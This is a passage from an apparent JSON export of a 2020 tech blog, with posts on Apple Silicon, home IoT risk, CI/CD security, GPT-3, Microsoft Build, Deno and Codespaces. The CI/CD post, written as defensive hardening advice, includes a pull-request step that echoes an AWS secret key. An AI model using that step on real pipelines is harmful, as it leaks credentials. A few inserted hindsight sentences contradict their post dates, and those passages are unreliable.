sorted out. But if you\u0026rsquo;re buying new hardware this year and you depend on running x86 VMs, the Intel Macs are still the safe bet.\nMy Take # I think this is the right move for Apple, and ultimately the right move for developers — even though the next year or two will involve some friction. ARM\u0026rsquo;s efficiency advantages are real and growing. Intel\u0026rsquo;s roadmap has been troubled, with repeated delays and a shrinking process node advantage. 
Apple building their own silicon gives them control over the entire stack from transistor to API, which is a powerful position.\nWhat excites me most is the potential for always-on, instant-wake laptops with genuine all-day battery life that can still compile code quickly. The current MacBook Pro is a compromise machine — it\u0026rsquo;s either fast or cool and quiet, rarely both. If Apple\u0026rsquo;s claims hold up, ARM Macs could be fast and efficient simultaneously.\nThe developer ecosystem will adapt. It always does. But if you\u0026rsquo;re making hardware purchasing decisions in the next six months, think carefully about your dependency on x86-specific tooling. The future is ARM, and it\u0026rsquo;s arriving faster than most of us expected.\n","date":"25 June 2020","externalUrl":null,"permalink":"/posts/200625-apple-silicon-arm-mac-transition/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Apple announces the transition from Intel to custom ARM chips for Mac. Here’s what developers need to prepare for.","title":"Apple Silicon — What the ARM Mac Transition Means for Developers","type":"posts"},{"content":"Here\u0026rsquo;s an uncomfortable truth that\u0026rsquo;s been nagging at me since March: millions of knowledge workers are now connecting to corporate networks from home, and their home networks are increasingly populated with IoT devices that have the security posture of a wet paper bag. Smart speakers, security cameras, robot vacuums, smart plugs, connected appliances — all sharing a flat network with the laptop that has VPN access to production systems.\nThe numbers tell the story. Smart home device sales have surged during lockdown, with IDC reporting strong growth across smart speakers, connected lighting, and home security cameras. People stuck at home are buying devices to make their environment more comfortable and controllable. That\u0026rsquo;s perfectly rational consumer behavior. 
But from a security perspective, every one of those devices is a potential entry point.\nThe Flat Network Problem # Most home routers create a single, flat network. Every device — your work laptop, your kid\u0026rsquo;s tablet, the Ring doorbell, the Philips Hue bridge, that off-brand smart plug you bought for €8 — sits on the same subnet, can discover each other, and can communicate freely.\nThis is fundamentally different from a corporate environment where network segmentation, VLANs, and firewall rules provide defense in depth. In the office, a compromised IoT device in the break room can\u0026rsquo;t reach the development servers because they\u0026rsquo;re on different network segments. At home, a compromised IoT device can potentially reach your work laptop, and through the VPN, your employer\u0026rsquo;s infrastructure.\nThe attack path is real, not theoretical. Research presented at Black Hat and DEF CON over the past few years has repeatedly demonstrated that consumer IoT devices can be compromised via firmware vulnerabilities, weak default credentials, unencrypted local APIs, and supply chain manipulation. Once compromised, they can perform ARP spoofing, DNS hijacking, or direct network attacks against other devices on the same subnet.\nWhat\u0026rsquo;s Actually Running on Your Network? # I spent a rainy Sunday afternoon running nmap scans against my own home network, and the results were educational. Beyond the devices I expected, I found:\nA network printer with a web interface running an unpatched HTTP server Two smart plugs phoning home to servers in regions I\u0026rsquo;d rather they didn\u0026rsquo;t A smart TV making regular connections to advertising and analytics endpoints An old Raspberry Pi I\u0026rsquo;d forgotten about, still running Raspbian with default SSH credentials That last one was particularly embarrassing for someone who writes about security. 
But it illustrates the problem: home networks accumulate devices over time, and there\u0026rsquo;s no equivalent of an enterprise asset inventory or patch management system keeping track of them.\nThe Shodan search engine regularly catalogs millions of IoT devices directly accessible from the internet — UPnP-enabled routers that have punched holes in the firewall, IP cameras with default credentials, network-attached storage with known vulnerabilities. If your home router has UPnP enabled (it probably does, by default), your IoT devices may be making themselves accessible from the internet without your knowledge.\nThe Enterprise Response (So Far) # Some organizations are responding to this reality. I\u0026rsquo;ve seen a few approaches:\nSplit-tunnel VPN: Instead of routing all traffic through the corporate VPN, only route traffic destined for corporate resources. This reduces the exposure but doesn\u0026rsquo;t eliminate the risk of a compromised device on the local network attacking the work laptop directly.\nAlways-on endpoint detection: Deploying EDR (Endpoint Detection and Response) tools on corporate laptops that monitor for suspicious local network activity. This is probably the most practical approach, but it adds overhead and complexity.\nNetwork segmentation guidance: Some IT departments are publishing guides for employees on setting up guest networks for IoT devices, separate from the network used for work. Modern consumer routers often support guest networks, but they\u0026rsquo;re rarely configured.\nZero-trust networking: The most forward-looking approach — treat every network as hostile, authenticate and encrypt every connection, and never trust the network layer. Products like Cloudflare Access, Zscaler, and Google\u0026rsquo;s BeyondCorp implementation represent this direction. 
But adopting zero-trust is a significant architectural change that most organizations are still evaluating.\nPractical Steps for Developers # If you\u0026rsquo;re a developer working from home — and statistically, you probably are right now — here are concrete steps to reduce your exposure:\nSegment your network: Use your router\u0026rsquo;s guest network feature to isolate IoT devices. Put your work laptop and any devices you actually trust on the primary network. Everything else goes on the guest network with client isolation enabled.\nDisable UPnP: Turn off Universal Plug and Play on your router. Yes, some devices will complain. That\u0026rsquo;s fine. Manual port forwarding for the few things that genuinely need it is vastly more secure than letting every device punch holes in your firewall.\nAudit your devices: Run a network scan. Know what\u0026rsquo;s on your network. If you find devices you don\u0026rsquo;t recognize or can\u0026rsquo;t account for, investigate. Tools like Fing make this easy even without command-line expertise.\nUpdate firmware: Check for firmware updates on your router, your smart home hub, and your most critical IoT devices. Set a calendar reminder to do this monthly. Yes, it\u0026rsquo;s tedious. So is incident response.\nUse a Pi-hole or DNS-based filtering: Running a Pi-hole on your network gives you visibility into what your devices are doing and the ability to block unwanted connections. The telemetry from some IoT devices is eye-opening.\nMy Take # The collision between consumer IoT and corporate security was always coming. The pandemic just compressed the timeline from years to months. Most organizations\u0026rsquo; security models assumed that employees would connect from relatively controlled environments — corporate offices, maybe a simple home setup with a laptop and a phone. 
The reality of 2020 is that employees are connecting from networks populated with dozens of devices of varying provenance and security quality.\nI don\u0026rsquo;t think the answer is banning IoT devices or trying to control employees\u0026rsquo; home environments — that\u0026rsquo;s impractical and invasive. The answer is the one the security community has been advocating for years: zero-trust networking, strong endpoint security, and defense in depth. The assumption that the network is safe was always questionable. Now it\u0026rsquo;s clearly untenable.\nThe IoT industry also needs to step up. We\u0026rsquo;re still seeing devices shipped with default credentials, no automatic updates, and end-of-life support measured in months rather than years. The EU\u0026rsquo;s proposed cybersecurity labeling scheme for IoT devices can\u0026rsquo;t come soon enough. Until then, every device on your home network is a liability until proven otherwise.\n","date":"18 June 2020","externalUrl":null,"permalink":"/posts/200618-iot-growth-pandemic-security/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Home IoT device sales have surged during lockdowns, and every one of those devices just joined a corporate network via VPN. The security implications are significant.","title":"The Pandemic IoT Boom — More Devices, More Risk, Same Old Problems","type":"posts"},{"content":"Three months into the remote work shift, most organizations have figured out the basics: VPNs, video calls, cloud-based collaboration tools. 
But there\u0026rsquo;s a less visible change that concerns me more — the rapid expansion and loosening of CI/CD pipelines to accommodate distributed teams, often without corresponding security review.\nI\u0026rsquo;ve been consulting with several teams over the past few weeks, and a pattern keeps emerging: pipelines that were designed for a small team working from an office network are now exposed to a much broader set of access patterns, credentials, and integration points. The attack surface has grown, and the security posture hasn\u0026rsquo;t kept up.\nThe Credential Sprawl Problem # The most immediate risk is credential management. A typical CI/CD pipeline has access to an alarming number of secrets: cloud provider credentials, container registry tokens, database passwords, API keys for third-party services, SSH keys for deployment targets. These credentials are often stored in the CI system\u0026rsquo;s secret management — GitHub Secrets, GitLab CI variables, Jenkins credentials store — but the scope of who and what can trigger pipeline runs has expanded.\nBefore March, many teams had implicit security controls: code was pushed from known IP ranges, builds ran on on-premises Jenkins servers, deployment was gated by a few senior engineers who were physically present. Now, code is pushed from home networks, self-hosted runners are accessed over VPN, and the pressure to ship quickly has loosened change approval processes.\nI reviewed one team\u0026rsquo;s GitHub Actions configuration last week and found production AWS credentials with AdministratorAccess being injected into every pull request build — including PRs from forks. That\u0026rsquo;s not a theoretical vulnerability; it\u0026rsquo;s an open door. Anyone who submits a PR can exfiltrate those credentials by adding a run: echo $AWS_SECRET_ACCESS_KEY step.\nSupply Chain Attacks via Build Dependencies # The second vector that worries me is dependency resolution during builds. 
Most modern build pipelines pull dependencies from public registries — npm, PyPI, Maven Central, Docker Hub — as part of every build. In a secure network, you might have a proxy or artifact cache that provides some control. In the rush to enable remote builds, several teams I\u0026rsquo;ve talked to bypassed these caches because they were only accessible from the office network.\n\nThis means builds are now pulling directly from public registries, which exposes them to dependency confusion attacks, typosquatting, and compromised packages. Alex Birsan\u0026rsquo;s research on dependency confusion would not be published until later, but the underlying vulnerability — that private package names can be shadowed by public packages with higher version numbers — has been known for a while.\n\nThe mitigation is straightforward in principle: use a package proxy like Artifactory, Nexus, or even a simple npm/PyPI mirror, and configure your builds to pull exclusively from it. Pin your dependency versions. Use lock files. Verify checksums. Most teams know this but haven\u0026rsquo;t implemented it consistently across all build environments.\n\nSelf-Hosted Runners: The Forgotten Perimeter # If you\u0026rsquo;re running self-hosted CI runners — whether Jenkins agents, GitLab runners, or GitHub Actions self-hosted runners — you\u0026rsquo;ve effectively created compute resources that execute arbitrary code triggered by repository events. In an on-premises environment with proper network segmentation, the blast radius of a compromised runner is limited.\n\nIn a remote-work setup, runners are often provisioned in cloud environments with broader network access. They might have credentials to reach production infrastructure, internal APIs, or databases. 
A malicious or compromised pipeline step can use the runner as a pivot point into your infrastructure.\nGitHub has documented the risks of self-hosted runners with public repositories, but the same principles apply to private repos if you don\u0026rsquo;t trust all contributors. The recommendation is to run builds in ephemeral, isolated environments — containers or VMs that are destroyed after each build. But implementing this properly requires investment in infrastructure that many teams haven\u0026rsquo;t made.\nHardening Recommendations # Based on what I\u0026rsquo;ve seen across multiple teams, here\u0026rsquo;s a practical checklist for tightening your CI/CD security:\nCredential scoping: Never inject production credentials into PR builds. Use environment-based secret scoping (GitHub\u0026rsquo;s environment protection rules, GitLab\u0026rsquo;s protected variables). Rotate credentials regularly — if you haven\u0026rsquo;t rotated since the office closed, do it now.\nBuild isolation: Run builds in ephemeral containers. Don\u0026rsquo;t reuse build environments across projects. If you\u0026rsquo;re using self-hosted runners, ensure they don\u0026rsquo;t have network access to production systems.\nDependency pinning: Pin all dependencies to specific versions with lock files. Use a private artifact proxy. Consider tools like Dependabot or Renovate for automated dependency updates with review.\nPipeline-as-code review: Treat your CI configuration files (.github/workflows/*.yml, .gitlab-ci.yml, Jenkinsfile) as security-critical code. Require review for changes. Use CODEOWNERS to restrict who can modify pipeline definitions.\nAudit logging: Enable and monitor audit logs for your CI system. Know who triggered what build, what credentials were accessed, and what artifacts were produced. Most CI systems provide this; few teams actually look at the logs.\nMy Take # CI/CD pipelines have become the circulatory system of modern software delivery. 
We\u0026rsquo;ve invested heavily in making them fast, reliable, and automated. We haven\u0026rsquo;t invested nearly enough in making them secure.\nThe remote work shift didn\u0026rsquo;t create these vulnerabilities — they were always there. But it removed several layers of implicit security (network perimeter, physical presence, slow pace of change) that were masking the underlying risks. The teams that had already adopted zero-trust principles for their build infrastructure are fine. The teams that relied on \u0026ldquo;well, it\u0026rsquo;s on the internal network\u0026rdquo; are now scrambling.\nMy advice: treat your CI/CD pipeline with the same security rigor you apply to production systems. Because in practice, it is a production system — one that has access to all your other production systems. The fact that it runs in the background and \u0026ldquo;just works\u0026rdquo; makes it easy to overlook. Don\u0026rsquo;t.\nIf you only do one thing this week, audit the credentials available to your PR builds. You might not like what you find.\n","date":"11 June 2020","externalUrl":null,"permalink":"/posts/200611-cicd-pipeline-security-remote-work/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"As teams rushed to enable remote development workflows, CI/CD pipelines became a prime target. Here’s what’s going wrong and how to harden your build infrastructure.","title":"Your CI/CD Pipeline Is Your New Attack Surface — And Remote Work Made It Worse","type":"posts"},{"content":"OpenAI just dropped their GPT-3 paper, and the numbers alone are staggering: 175 billion parameters, trained on a filtered version of Common Crawl plus books and Wikipedia, at an estimated training cost of several million dollars in compute. That\u0026rsquo;s roughly 100x larger than GPT-2, which itself was considered large when it launched just over a year ago. 
But the size isn\u0026rsquo;t the story — it\u0026rsquo;s what the model can do without being explicitly trained for specific tasks.\nFew-Shot Learning: The Real Breakthrough # The core finding of the paper is that GPT-3 can perform a wide range of NLP tasks — translation, question answering, arithmetic, even basic code generation — with just a handful of examples provided in the prompt. No fine-tuning, no task-specific training data, no gradient updates. You write a prompt with a few examples of the pattern you want, and the model generalizes.\nThis is what the researchers call \u0026ldquo;few-shot learning,\u0026rdquo; and it represents a meaningful shift from the fine-tuning paradigm that has dominated NLP since BERT. This in-context learning capability would eventually become central to how developers interact with large language models. With BERT and its descendants, you take a pre-trained model and fine-tune it on a labeled dataset for your specific task. That works well but requires curating training data and running training jobs for every new application.\nGPT-3 suggests an alternative: a single model, large enough, might learn to perform tasks just from the structure of natural language itself. The implications for practical NLP applications are significant. If you can get useful results from a few prompt examples instead of thousands of labeled training samples, that changes the economics of building language-powered features.\nWhat It Can (and Can\u0026rsquo;t) Do # The paper tests GPT-3 across dozens of benchmarks. On some, it matches or exceeds the state of the art set by fine-tuned models. On others, it falls short. The pattern is interesting: GPT-3 excels at tasks that can be framed as text completion or text transformation. Translation, summarization, question answering — these map naturally to \u0026ldquo;given this context, produce this output.\u0026rdquo;\nWhere it struggles is with tasks requiring precise logical reasoning or structured output. 
The arithmetic examples are illustrative: GPT-3 can do simple addition and subtraction, but accuracy drops sharply as the numbers get larger. It\u0026rsquo;s pattern-matching, not computing.\nThe code generation examples are particularly interesting for developers. The paper shows GPT-3 generating simple Python functions from natural language descriptions. Not production-quality code, and not reliably, but the fact that it can do it at all from few-shot prompts suggests a direction that could eventually be useful for developer tooling.\nThe Scale Question # GPT-3 raises uncomfortable questions about the trajectory of AI research. The model\u0026rsquo;s performance scales with size in a fairly predictable way — the paper includes scaling curves showing steady improvement from 125 million to 175 billion parameters. The implication is that making models bigger makes them better, at least up to the scales tested.\nBut training a 175 billion parameter model is not something most organizations can do. The compute cost alone is estimated at $4.6 million for a single training run, according to Lambda Labs\u0026rsquo; analysis. That doesn\u0026rsquo;t include the engineering effort, the data pipeline, or the iteration cycles that inevitably precede a successful training run.\nThis creates a concentration dynamic where only a handful of organizations — OpenAI, Google, Facebook, and a few others — can train models at this scale. OpenAI has signaled that they\u0026rsquo;ll offer API access rather than releasing the model weights, which is a different approach from the open-source ethos that has driven much of AI research.\nWhether that\u0026rsquo;s the right call is debatable. GPT-2\u0026rsquo;s staged release (where OpenAI initially withheld the full model) was controversial but arguably reasonable — though the dire predictions about misuse didn\u0026rsquo;t fully materialize. GPT-3 is powerful enough that the API-only approach might make more sense from a safety perspective. 
But it also means the broader research community can\u0026rsquo;t inspect, reproduce, or build upon the work in the way that has traditionally accelerated progress. When the API finally launched, developer access opened up new possibilities.\n\nWhat This Means for Developers # If you\u0026rsquo;re a developer thinking about integrating language AI into applications, GPT-3 is both exciting and frustrating. Exciting because the few-shot capability dramatically lowers the barrier to experimenting with NLP features. Once the API became available, developers could immediately begin exploring its capabilities and limitations. Frustrating because, as of this writing, the model itself is not accessible: OpenAI has signaled API access rather than a release of the weights.\n\nIn the meantime, the practical options remain fine-tuning smaller models like GPT-2, BERT, or the various transformer variants available through Hugging Face. For most production use cases, a well-tuned smaller model will still outperform GPT-3\u0026rsquo;s few-shot capabilities within its specific domain.\n\nThe more important takeaway is strategic: language models are getting good enough, fast enough, that every application that involves text — and that\u0026rsquo;s most of them — should be thinking about where AI-powered text processing could add value. Search, summarization, classification, generation — these capabilities are moving from research demos to production features faster than many of us expected.\n\nMy Take # I\u0026rsquo;ve been following NLP progress since the days of rule-based systems and bag-of-words models, and the pace of change in the last three years has been extraordinary. GPT-3 doesn\u0026rsquo;t feel like a breakthrough in the scientific sense — it\u0026rsquo;s more of a brute-force scaling result that validates the transformer architecture\u0026rsquo;s potential. But it may be a breakthrough in the practical sense, by making it easy enough to build useful language features that more developers actually do it.\n\nMy worry is the concentration effect. 
If the most capable models are only available through APIs controlled by a few companies, that shapes who gets to build what. The open-source ecosystem around transformers — Hugging Face, the various BERT variants, projects like EleutherAI that are trying to replicate large models openly — is critical to keeping this technology accessible.\nFor now, I\u0026rsquo;d recommend every development team spend an afternoon experimenting with the current generation of publicly available models. The capabilities might surprise you, and you\u0026rsquo;ll be better positioned to take advantage of GPT-3 when — or if — it becomes accessible.\n","date":"28 May 2020","externalUrl":null,"permalink":"/posts/200528-openai-gpt3-language-model/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI publishes the GPT-3 paper, a 175 billion parameter language model that demonstrates surprising few-shot learning capabilities across a range of NLP tasks.","title":"GPT-3 — OpenAI's 175 Billion Parameter Bet on Language","type":"posts"},{"content":"Microsoft Build just wrapped up, and even though it was their first fully-virtual conference — a sign of the times — the announcements packed a serious punch for developers. The headline for me? WSL 2 hitting general availability with the Windows 10 May 2020 Update. After years of Windows being a second-class citizen for systems programming, we\u0026rsquo;re in a genuinely different world now.\nWSL 2: Linux on Windows, Done Right # I\u0026rsquo;ve been running the WSL 2 preview for a few months, and the jump from WSL 1 to WSL 2 is not incremental — it\u0026rsquo;s architectural. WSL 1 was a compatibility layer that translated Linux syscalls to Windows NT kernel calls. Clever, but limited. WSL 2 runs an actual Linux kernel in a lightweight VM, managed by the Hyper-V hypervisor. 
The result is full system call compatibility and dramatically better file system performance.\nThe numbers Microsoft shared are striking: tar extraction is roughly 20x faster, git clone about 2-3x faster, and npm install noticeably snappier. For anyone who has suffered through Node.js dependency resolution on Windows, that alone might be worth the upgrade.\nWhat excites me more than raw performance is the implication for development workflows. With WSL 2, you can run Docker containers natively through the Docker Desktop WSL 2 backend. No more Hyper-V VM sitting alongside your dev environment. Your containers run inside WSL 2, sharing the same Linux kernel. It\u0026rsquo;s cleaner, faster, and uses less memory. I\u0026rsquo;ve been testing this with a moderately complex microservices setup and the difference in startup time is noticeable.\nThe integration with VS Code via the Remote - WSL extension means you can edit files on the Windows side while your build tools, linters, and language servers run inside Linux. It\u0026rsquo;s the best of both worlds, and it actually works well in practice — something I couldn\u0026rsquo;t say about earlier attempts at cross-platform development on Windows.\nWindows Terminal 1.0: Finally, a Proper Terminal # Alongside WSL 2, Microsoft shipped Windows Terminal 1.0. It sounds almost absurd to celebrate a terminal emulator in 2020, but anyone who has used the default Windows console knows this was long overdue. GPU-accelerated text rendering, tabs, split panes, full Unicode and emoji support, and a JSON-based configuration file.\nThe JSON config is a deliberate nod to the developer audience. No registry hacks, no buried settings dialogs — just a config file you can version-control alongside your dotfiles. It\u0026rsquo;s a small thing, but it signals that the Windows team understands how developers work.\nI\u0026rsquo;ve switched to it as my daily driver for both PowerShell and WSL sessions. 
The ability to have a Bash tab next to a PowerShell tab next to an Azure Cloud Shell tab is genuinely useful when you\u0026rsquo;re juggling infrastructure work across environments.\nAzure and the Cloud Developer Experience # Build 2020 also showcased a wave of Azure announcements. Azure Static Web Apps entered preview, offering a streamlined deployment pipeline for JAMstack applications that connects directly to GitHub repos. Azure Communication Services was announced as a competitor to Twilio. And Azure Synapse Analytics got tighter integration with Power BI and Azure Machine Learning.\nBut the theme that ran through everything was reducing friction for developers. Project Reunion, now in early stages, aims to unify the Win32 and UWP app models — a long-standing pain point for Windows developers. WinUI 3.0 Preview was shown running outside the UWP sandbox for the first time.\nMicrosoft is also pushing hard on GitHub integration across Azure DevOps, with GitHub Actions for Azure getting expanded capabilities. Given that GitHub Actions is already eating into the CI/CD market, tighter Azure integration could make it the path of least resistance for teams already in the Microsoft ecosystem.\nMy Take # I\u0026rsquo;ve been working with Microsoft technologies on and off for three decades, and the transformation under Nadella continues to impress. Five years ago, telling someone that Microsoft would ship a Linux kernel inside Windows and make their terminal open-source on GitHub would have sounded like a joke. Today, it\u0026rsquo;s just\u0026hellip; Wednesday at Build.\nThe developer-first strategy is paying off. By making Windows a credible platform for Linux development, Microsoft is addressing the single biggest reason many developers switched to macOS. You no longer need to choose between Windows-native tools and a proper Unix environment.\nThat said, WSL 2 isn\u0026rsquo;t perfect. 
File system performance across the Windows/Linux boundary (accessing /mnt/c from Linux) is still slower than native Linux paths. The networking model can be confusing — WSL 2 gets its own IP address, which trips up some port-forwarding scenarios. And GPU compute support is still in early preview.\nBut the trajectory is clear. Microsoft is building a platform where you can develop for any target — Linux servers, containers, cloud — without leaving Windows. For enterprise shops where Windows is mandated on developer machines, that\u0026rsquo;s transformative. For the rest of us, it\u0026rsquo;s a compelling reason to give Windows another look.\nThis Build felt less like a product announcement and more like a statement of direction. The developer experience is the product. And right now, Microsoft is executing on that vision better than most.\n","date":"21 May 2020","externalUrl":null,"permalink":"/posts/200521-microsoft-build-2020-wsl2/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Microsoft Build 2020 goes fully virtual and doubles down on developer experience with WSL 2 GA, Windows Terminal 1.0, and tighter Azure integrations.","title":"Microsoft Build 2020 — WSL 2, Windows Terminal, and the Developer-First Pivot","type":"posts"},{"content":"Yesterday, Deno 1.0 was released. If you\u0026rsquo;re not familiar with the backstory: Deno is a new JavaScript and TypeScript runtime created by Ryan Dahl, the same person who created Node.js. In his now-famous 2018 JSConf talk \u0026ldquo;10 Things I Regret About Node.js,\u0026rdquo; Dahl catalogued the design mistakes he made with Node and announced he was building something new. Two years later, that something is here. 
This comes amid broader evolution in the JavaScript ecosystem, where TypeScript continues to mature and Node.js itself improves on its core fundamentals.\nI\u0026rsquo;ve been following Deno\u0026rsquo;s development since that talk, and I\u0026rsquo;ve been running the pre-release versions for side projects over the past few months. Now that it\u0026rsquo;s hit 1.0, it\u0026rsquo;s worth a serious look at what it gets right, what it gets wrong, and whether it has a realistic path to meaningful adoption.\nWhat Deno Does Differently # The differences from Node.js are philosophical as much as technical. Let me highlight the ones that matter most.\nSecurity by default. Deno runs with no file, network, or environment access unless explicitly granted. Want to read a file? You need --allow-read. Want to make an HTTP request? --allow-net. This is a dramatic departure from Node, where any script can access the full filesystem, make network calls, and read environment variables. The Node model made sense in 2009 when server-side JavaScript was a novelty and scripts were trusted by default. In 2020, when we routinely install hundreds of npm packages from anonymous authors, the lack of sandboxing in Node is genuinely concerning. Deno\u0026rsquo;s approach isn\u0026rsquo;t perfect — the permissions are coarse-grained and can be annoying in development — but the principle is sound.\nTypeScript built in. Deno compiles TypeScript natively, no tsconfig.json, no ts-node, no build step. You write .ts files and run them directly. The TypeScript compiler is bundled into the Deno binary, and compilation results are cached. This is a remarkable developer experience improvement. TypeScript has been evolving rapidly to support better developer experiences, and Deno\u0026rsquo;s integration takes this to the next level. In the Node world, using TypeScript means maintaining a parallel build pipeline — configuring tsc, setting up source maps, managing declaration files. 
Deno eliminates all of that friction.\nNo node_modules. Perhaps the most radical decision. Deno doesn\u0026rsquo;t have a package manager. Modules are imported via URLs, similar to how browsers handle ES modules. Instead of npm install express and require('express'), you write import { serve } from \u0026quot;https://deno.land/std/http/server.ts\u0026quot;. Modules are downloaded and cached on first run.\nStandard library. Deno ships with a reviewed standard library covering common tasks: HTTP servers, file system utilities, testing, logging, datetime manipulation. This is something Node has always lacked — in the Node ecosystem, you need a third-party package for practically everything, which is why a typical node_modules folder contains hundreds of packages for even simple projects.\nThe Good # Having used Deno for a few small projects, the developer experience is genuinely pleasant. The single binary installation (one curl command), native TypeScript, and built-in tooling (deno fmt, deno test, deno lint) create a cohesive environment that Node can\u0026rsquo;t match without a stack of third-party tools.\nThe standard library is well-designed and draws on Go\u0026rsquo;s standard library philosophy: include enough that developers don\u0026rsquo;t need external dependencies for common tasks, maintain a high quality bar, and provide consistent APIs. The HTTP server module, for instance, is simple enough for basic use and composable enough for more complex scenarios.\nThe permissions model, while occasionally annoying during development, forces you to think about what your code actually needs. I ran a dependency analysis on one of my Node projects recently and realized that transitive dependencies had access to my entire filesystem and network. 
With Deno, that surface area is explicit and visible.\nAnd the URL-based imports, controversial as they are, eliminate the entire class of problems around package resolution, hoisting, phantom dependencies, and the node_modules black hole. No more npm install and praying that your lockfile resolves correctly. No more EACCES permission errors. No more wondering why your build works locally but fails in CI because of subtly different dependency resolution.\nThe Challenges # Let\u0026rsquo;s not sugarcoat the obstacles. Deno faces enormous challenges.\nThe npm ecosystem is Node\u0026rsquo;s greatest asset, and Deno can\u0026rsquo;t access it. There are over 1.3 million packages on npm, representing hundreds of thousands of developer-years of effort. Deno has its own module registry at deno.land/x, but it currently hosts a few hundred modules. For any non-trivial application, you\u0026rsquo;re going to hit a wall where the library you need exists on npm but not for Deno.\nURL-based imports have real problems. What happens when the server hosting your dependency goes down? What about versioning — do you pin to a specific URL path, or do you risk importing breaking changes? Deno addresses some of this with import maps and lock files, but the ergonomics aren\u0026rsquo;t there yet. I\u0026rsquo;ve already had a situation where a URL changed and broke my build, which is exactly the kind of thing package-lock.json was designed to prevent.\nThe TypeScript compilation, while convenient, adds startup overhead. For long-running servers this is negligible, but for CLI tools and scripts, the cold-start time is noticeable compared to Node. Deno caches compiled output, so subsequent runs are fast, but the first run of a new script or after a code change involves compilation.\nAnd there\u0026rsquo;s the pragmatic question: who is Deno for? If you have existing Node applications in production, there\u0026rsquo;s no migration path. 
Deno isn\u0026rsquo;t Node-compatible — your Express routes, your Koa middleware, your thousands of lines of Node-specific code won\u0026rsquo;t just work. Deno is a from-scratch rewrite of your runtime, which means it\u0026rsquo;s only realistic for new projects.\nMy Take # I think Deno is an important project regardless of whether it achieves widespread adoption. It demonstrates that the ideas underpinning Node.js — which were revolutionary in 2009 — can be substantially improved upon. The security model, the TypeScript integration, the standard library approach, the single-binary distribution — these are all better than what Node offers, and they should push the Node ecosystem to improve.\nWill Deno replace Node? Not in the near term, and probably not ever in the way that Node replaced previous server-side JavaScript attempts. The npm ecosystem is too deep, the existing codebase too vast, the migration cost too high. But Deno doesn\u0026rsquo;t need to replace Node to be successful. If it captures even 10% of new server-side JavaScript projects, that\u0026rsquo;s a significant community.\nI\u0026rsquo;m going to keep using Deno for side projects, CLI tools, and prototypes. For production services that need a rich ecosystem of libraries and battle-tested frameworks, Node remains the practical choice. But I\u0026rsquo;m watching Deno\u0026rsquo;s ecosystem growth closely. If the standard library continues to mature and third-party modules reach a critical mass, the calculus could change. The broader pattern of runtime and platform iteration shows that the JavaScript ecosystem is rethinking its fundamentals.\nRyan Dahl got a rare second chance to apply lessons learned. Deno 1.0 shows he\u0026rsquo;s used it well. 
Now comes the harder part: convincing the world to care.\n","date":"14 May 2020","externalUrl":null,"permalink":"/posts/200514-deno-1-0-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Deno 1.0 launches with TypeScript support, a security-first permissions model, and a clean break from Node.js conventions — but can it find its niche?","title":"Deno 1.0 — Ryan Dahl's Do-Over for Server-Side JavaScript","type":"posts"},{"content":"Yesterday at GitHub Satellite — this year held as an online event for obvious reasons — the biggest announcement wasn\u0026rsquo;t another feature for Actions or an enhancement to code review. It was Codespaces: a full Visual Studio Code environment running in the cloud, accessible from your browser, integrated directly into GitHub repositories. Click a button, get a dev environment. It\u0026rsquo;s the kind of demo that makes you say \u0026ldquo;that\u0026rsquo;s cool\u0026rdquo; and then immediately start thinking about all the reasons it won\u0026rsquo;t work in practice. This comes as GitHub Actions continues to reshape CI/CD and the company consolidates developer tooling.\nBut I\u0026rsquo;ve been thinking about it for a day now, and I\u0026rsquo;m less dismissive than I expected to be.\nWhat Codespaces Actually Is # Codespaces is built on top of Visual Studio Online, which Microsoft launched last year. The underlying technology is a containerized VS Code server running on Azure, streamed to your browser (or to a local VS Code instance via a remote extension). Each codespace is a Linux container with configurable specs — you can choose your CPU, memory, and storage.\nThe GitHub integration is the interesting part. Repositories can include a .devcontainer folder with a devcontainer.json configuration file and an optional Dockerfile. This defines the development environment: which runtime versions to install, which VS Code extensions to pre-load, which ports to forward, which shell to use. 
When someone clicks \u0026ldquo;Open with Codespaces,\u0026rdquo; they get that exact environment, pre-configured, with the repository already cloned.\nThe demo showed someone opening a repository, making changes, running tests, and submitting a pull request — all from a browser tab. No local installation, no dependency management, no \u0026ldquo;it works on my machine\u0026rdquo; conversations. The time from clicking the button to having a working environment was about 30 seconds.\nWhy This Time Might Be Different # Cloud-based development environments have been attempted before. Cloud9 (now owned by AWS), Eclipse Che, Gitpod, Theia — the graveyard of almost-good-enough cloud IDEs stretches back years. I\u0026rsquo;ve tried most of them at one point or another, and they always hit the same wall: latency makes typing feel wrong, the environment is too constrained, or the configuration is too complex to justify the convenience.\nCodespaces has a few advantages that previous attempts lacked. First, it\u0026rsquo;s VS Code — the most popular editor among web developers by a significant margin. The extensions work, the keybindings work, the muscle memory transfers. This isn\u0026rsquo;t a web-based editor pretending to be an IDE; it\u0026rsquo;s the actual IDE, running remotely. Microsoft\u0026rsquo;s ownership of both GitHub and VS Code positions Codespaces at the center of developer tooling integration.\nSecond, the .devcontainer specification means the environment configuration lives with the code. This is the same \u0026ldquo;infrastructure as code\u0026rdquo; principle that made Docker successful for deployment. When a new contributor opens the repository, they don\u0026rsquo;t need to read a README with seventeen steps for setting up their local environment. They don\u0026rsquo;t need the right version of Python, the right version of Node, the right native dependencies. The container handles all of it.\nThird, GitHub\u0026rsquo;s reach matters. 
